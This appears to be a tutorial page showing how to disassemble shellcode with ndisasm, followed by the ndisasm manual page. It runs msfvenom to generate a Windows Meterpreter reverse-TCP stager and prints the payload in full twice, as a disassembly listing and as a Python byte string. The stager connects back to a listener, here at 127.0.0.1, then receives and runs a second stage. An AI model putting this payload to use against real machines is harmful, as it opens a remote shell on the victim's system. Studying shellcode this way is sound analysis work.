root:~ /# msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 -a x86 -f raw --platform win | ndisasm -u -
Found 0 compatible encoders
00000000 FC cld
00000001 E886000000 call dword 0x8c
00000006 60 pushad
00000007 89E5 mov ebp,esp
00000009 31D2 xor edx,edx
0000000B 648B5230 mov edx,[fs:edx+0x30]
0000000F 8B520C mov edx,[edx+0xc]
00000012 8B5214 mov edx,[edx+0x14]
00000015 8B7228 mov esi,[edx+0x28]
00000018 0FB74A26 movzx ecx,word [edx+0x26]
0000001C 31FF xor edi,edi
0000001E 31C0 xor eax,eax
00000020 AC lodsb
00000021 3C61 cmp al,0x61
00000023 7C02 jl 0x27
00000025 2C20 sub al,0x20
00000027 C1CF0D ror edi,0xd
0000002A 01C7 add edi,eax
0000002C E2F0 loop 0x1e
0000002E 52 push edx
0000002F 57 push edi
00000030 8B5210 mov edx,[edx+0x10]
00000033 8B423C mov eax,[edx+0x3c]
00000036 8B4C1078 mov ecx,[eax+edx+0x78]
0000003A E34A jecxz 0x86
0000003C 01D1 add ecx,edx
0000003E 51 push ecx
0000003F 8B5920 mov ebx,[ecx+0x20]
00000042 01D3 add ebx,edx
00000044 8B4918 mov ecx,[ecx+0x18]
00000047 E33C jecxz 0x85
00000049 49 dec ecx
0000004A 8B348B mov esi,[ebx+ecx*4]
0000004D 01D6 add esi,edx
0000004F 31FF xor edi,edi
00000051 31C0 xor eax,eax
00000053 AC lodsb
00000054 C1CF0D ror edi,0xd
00000057 01C7 add edi,eax
00000059 38E0 cmp al,ah
0000005B 75F4 jnz 0x51
0000005D 037DF8 add edi,[ebp-0x8]
00000060 3B7D24 cmp edi,[ebp+0x24]
00000063 75E2 jnz 0x47
00000065 58 pop eax
00000066 8B5824 mov ebx,[eax+0x24]
00000069 01D3 add ebx,edx
0000006B 668B0C4B mov cx,[ebx+ecx*2]
0000006F 8B581C mov ebx,[eax+0x1c]
00000072 01D3 add ebx,edx
00000074 8B048B mov eax,[ebx+ecx*4]
00000077 01D0 add eax,edx
00000079 89442424 mov [esp+0x24],eax
0000007D 5B pop ebx
0000007E 5B pop ebx
0000007F 61 popad
00000080 59 pop ecx
00000081 5A pop edx
00000082 51 push ecx
00000083 FFE0 jmp eax
00000085 58 pop eax
00000086 5F pop edi
00000087 5A pop edx
00000088 8B12 mov edx,[edx]
0000008A EB89 jmp short 0x15
0000008C 5D pop ebp
0000008D 6833320000 push dword 0x3233
00000092 687773325F push dword 0x5f327377
00000097 54 push esp
00000098 684C772607 push dword 0x726774c
0000009D FFD5 call ebp
0000009F B890010000 mov eax,0x190
000000A4 29C4 sub esp,eax
000000A6 54 push esp
000000A7 50 push eax
000000A8 6829806B00 push dword 0x6b8029
000000AD FFD5 call ebp
000000AF 50 push eax
000000B0 50 push eax
000000B1 50 push eax
000000B2 50 push eax
000000B3 40 inc eax
000000B4 50 push eax
000000B5 40 inc eax
000000B6 50 push eax
000000B7 68EA0FDFE0 push dword 0xe0df0fea
000000BC FFD5 call ebp
000000BE 97 xchg eax,edi
000000BF 6A05 push byte +0x5
000000C1 687F000001 push dword 0x100007f
000000C6 680200115C push dword 0x5c110002
000000CB 89E6 mov esi,esp
000000CD 6A10 push byte +0x10
000000CF 56 push esi
000000D0 57 push edi
000000D1 6899A57461 push dword 0x6174a599
000000D6 FFD5 call ebp
000000D8 85C0 test eax,eax
000000DA 740C jz 0xe8
000000DC FF4E08 dec dword [esi+0x8]
000000DF 75EC jnz 0xcd
000000E1 68F0B5A256 push dword 0x56a2b5f0
000000E6 FFD5 call ebp
000000E8 6A00 push byte +0x0
000000EA 6A04 push byte +0x4
000000EC 56 push esi
000000ED 57 push edi
000000EE 6802D9C85F push dword 0x5fc8d902
000000F3 FFD5 call ebp
000000F5 8B36 mov esi,[esi]
000000F7 6A40 push byte +0x40
000000F9 6800100000 push dword 0x1000
000000FE 56 push esi
000000FF 6A00 push byte +0x0
00000101 6858A453E5 push dword 0xe553a458
00000106 FFD5 call ebp
00000108 93 xchg eax,ebx
00000109 53 push ebx
0000010A 6A00 push byte +0x0
0000010C 56 push esi
0000010D 53 push ebx
0000010E 57 push edi
0000010F 6802D9C85F push dword 0x5fc8d902
00000114 FFD5 call ebp
00000116 01C3 add ebx,eax
00000118 29C6 sub esi,eax
0000011A 85F6 test esi,esi
0000011C 75EC jnz 0x10a
0000011E C3 ret
If you have python shellcode, we can disass it also.
root:~ /# cat shellcode.py
#!/usr/bin/env python
# -*- coding: utf8 -*-
buf = ""
buf += "\xfc\xe8\x86\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b"
buf += "\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
buf += "\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20"
buf += "\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b"
buf += "\x42\x3c\x8b\x4c\x10\x78\xe3\x4a\x01\xd1\x51\x8b\x59"
buf += "\x20\x01\xd3\x8b\x49\x18\xe3\x3c\x49\x8b\x34\x8b\x01"
buf += "\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0"
buf += "\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58"
buf += "\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
buf += "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a"
buf += "\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x89\x5d\x68\x33"
buf += "\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26"
buf += "\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
buf += "\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40"
buf += "\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x7f"
buf += "\x00\x00\x01\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56"
buf += "\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff"
buf += "\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00"
buf += "\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36"
buf += "\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4"
buf += "\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02"
buf += "\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec"
buf += "\xc3"
print buf
root:~ /# python2 shellcode.py | ndisasm -u -
00000000 FC cld
00000001 E886000000 call dword 0x8c
00000006 60 pushad
00000007 89E5 mov ebp,esp
00000009 31D2 xor edx,edx
0000000B 648B5230 mov edx,[fs:edx+0x30]
0000000F 8B520C mov edx,[edx+0xc]
00000012 8B5214 mov edx,[edx+0x14]
00000015 8B7228 mov esi,[edx+0x28]
00000018 0FB74A26 movzx ecx,word [edx+0x26]
0000001C 31FF xor edi,edi
0000001E 31C0 xor eax,eax
00000020 AC lodsb
00000021 3C61 cmp al,0x61
00000023 7C02 jl 0x27
00000025 2C20 sub al,0x20
00000027 C1CF0D ror edi,0xd
0000002A 01C7 add edi,eax
0000002C E2F0 loop 0x1e
0000002E 52 push edx
0000002F 57 push edi
00000030 8B5210 mov edx,[edx+0x10]
00000033 8B423C mov eax,[edx+0x3c]
00000036 8B4C1078 mov ecx,[eax+edx+0x78]
0000003A E34A jecxz 0x86
0000003C 01D1 add ecx,edx
0000003E 51 push ecx
0000003F 8B5920 mov ebx,[ecx+0x20]
00000042 01D3 add ebx,edx
00000044 8B4918 mov ecx,[ecx+0x18]
00000047 E33C jecxz 0x85
00000049 49 dec ecx
0000004A 8B348B mov esi,[ebx+ecx*4]
0000004D 01D6 add esi,edx
0000004F 31FF xor edi,edi
00000051 31C0 xor eax,eax
00000053 AC lodsb
00000054 C1CF0D ror edi,0xd
00000057 01C7 add edi,eax
00000059 38E0 cmp al,ah
0000005B 75F4 jnz 0x51
0000005D 037DF8 add edi,[ebp-0x8]
00000060 3B7D24 cmp edi,[ebp+0x24]
00000063 75E2 jnz 0x47
00000065 58 pop eax
00000066 8B5824 mov ebx,[eax+0x24]
00000069 01D3 add ebx,edx
0000006B 668B0C4B mov cx,[ebx+ecx*2]
0000006F 8B581C mov ebx,[eax+0x1c]
00000072 01D3 add ebx,edx
00000074 8B048B mov eax,[ebx+ecx*4]
00000077 01D0 add eax,edx
00000079 89442424 mov [esp+0x24],eax
0000007D 5B pop ebx
0000007E 5B pop ebx
0000007F 61 popad
00000080 59 pop ecx
00000081 5A pop edx
00000082 51 push ecx
00000083 FFE0 jmp eax
00000085 58 pop eax
00000086 5F pop edi
00000087 5A pop edx
00000088 8B12 mov edx,[edx]
0000008A EB89 jmp short 0x15
0000008C 5D pop ebp
0000008D 6833320000 push dword 0x3233
00000092 687773325F push dword 0x5f327377
00000097 54 push esp
00000098 684C772607 push dword 0x726774c
0000009D FFD5 call ebp
0000009F B890010000 mov eax,0x190
000000A4 29C4 sub esp,eax
000000A6 54 push esp
000000A7 50 push eax
000000A8 6829806B00 push dword 0x6b8029
000000AD FFD5 call ebp
000000AF 50 push eax
000000B0 50 push eax
000000B1 50 push eax
000000B2 50 push eax
000000B3 40 inc eax
000000B4 50 push eax
000000B5 40 inc eax
000000B6 50 push eax
000000B7 68EA0FDFE0 push dword 0xe0df0fea
000000BC FFD5 call ebp
000000BE 97 xchg eax,edi
000000BF 6A05 push byte +0x5
000000C1 687F000001 push dword 0x100007f
000000C6 680200115C push dword 0x5c110002
000000CB 89E6 mov esi,esp
000000CD 6A10 push byte +0x10
000000CF 56 push esi
000000D0 57 push edi
000000D1 6899A57461 push dword 0x6174a599
000000D6 FFD5 call ebp
000000D8 85C0 test eax,eax
000000DA 740C jz 0xe8
000000DC FF4E08 dec dword [esi+0x8]
000000DF 75EC jnz 0xcd
000000E1 68F0B5A256 push dword 0x56a2b5f0
000000E6 FFD5 call ebp
000000E8 6A00 push byte +0x0
000000EA 6A04 push byte +0x4
000000EC 56 push esi
000000ED 57 push edi
000000EE 6802D9C85F push dword 0x5fc8d902
000000F3 FFD5 call ebp
000000F5 8B36 mov esi,[esi]
000000F7 6A40 push byte +0x40
000000F9 6800100000 push dword 0x1000
000000FE 56 push esi
000000FF 6A00 push byte +0x0
00000101 6858A453E5 push dword 0xe553a458
00000106 FFD5 call ebp
00000108 93 xchg eax,ebx
00000109 53 push ebx
0000010A 6A00 push byte +0x0
0000010C 56 push esi
0000010D 53 push ebx
0000010E 57 push edi
0000010F 6802D9C85F push dword 0x5fc8d902
00000114 FFD5 call ebp
00000116 01C3 add ebx,eax
00000118 29C6 sub esi,eax
0000011A 85F6 test esi,esi
0000011C 75EC jnz 0x10a
0000011E C3 ret
NDISASM(1) NDISASM(1)
NAME
ndisasm - the Netwide Disassembler, an 80x86 binary file disassembler
SYNOPSIS
ndisasm [ -o origin ] [ -s sync-point [...]] [ -a | -i ] [ -b bits ] [ -u ] [ -e hdrlen ] [ -k offset,length [...]] infile
ndisasm -h
ndisasm -r
DESCRIPTION
The ndisasm command generates a disassembly listing of the binary file infile and directs it to stdout.
OPTIONS
-h Causes ndisasm to exit immediately, after giving a summary of its invocation options.
-r Causes ndisasm to exit immediately, after displaying its version number.
-o origin
Specifies the notional load address for the file. This option causes ndisasm to get the addresses it lists down the left hand margin, and the target
addresses of PC-relative jumps and calls, right.
-s sync-point
Manually specifies a synchronisation address, such that ndisasm will not output any machine instruction which encompasses bytes on both sides of the
address. Hence the instruction which starts at that address will be correctly disassembled.
-e hdrlen
Specifies a number of bytes to discard from the beginning of the file before starting disassembly. This does not count towards the calculation of the
disassembly offset: the first disassembled instruction will be shown starting at the given load address.
-k offset,length
Specifies that length bytes, starting from disassembly offset offset, should be skipped over without generating any output. The skipped bytes still
count towards the calculation of the disassembly offset.
-a or -i
Enables automatic (or intelligent) sync mode, in which ndisasm will attempt to guess where synchronisation should be performed, by means of examining
the target addresses of the relative jumps and calls it disassembles.
-b bits
Specifies 16-, 32- or 64-bit mode. The default is 16-bit mode.
-u Specifies 32-bit mode, more compactly than using `-b 32'.
-p vendor
Prefers instructions as defined by vendor in case of a conflict. Known vendor names include intel, amd, cyrix, and idt. The default is intel.
RESTRICTIONS
ndisasm only disassembles binary files: it has no understanding of the header information present in object or executable files. If you want to disassemble
an object file, you should probably be using objdump(1).
Auto-sync mode won't necessarily cure all your synchronisation problems: a sync marker can only be placed automatically if a jump or call instruction is
found to refer to it before ndisasm actually disassembles that part of the code. Also, if spurious jumps or calls result from disassembling non-machine-code
data, sync markers may get placed in strange places. Feel free to turn auto-sync off and go back to doing it manually if necessary.
SEE ALSO
objdump(1).
The Netwide Assembler Project NDISASM(1)
Manual page ndisas